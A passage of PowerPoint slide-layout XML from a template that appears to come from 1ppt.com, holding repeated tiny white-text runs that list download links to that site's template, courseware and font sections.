            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout60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60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60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60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61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61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61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61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61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61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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout61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61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61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61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62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62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62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62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62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62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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout62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62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62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62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63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63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63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63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63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63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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
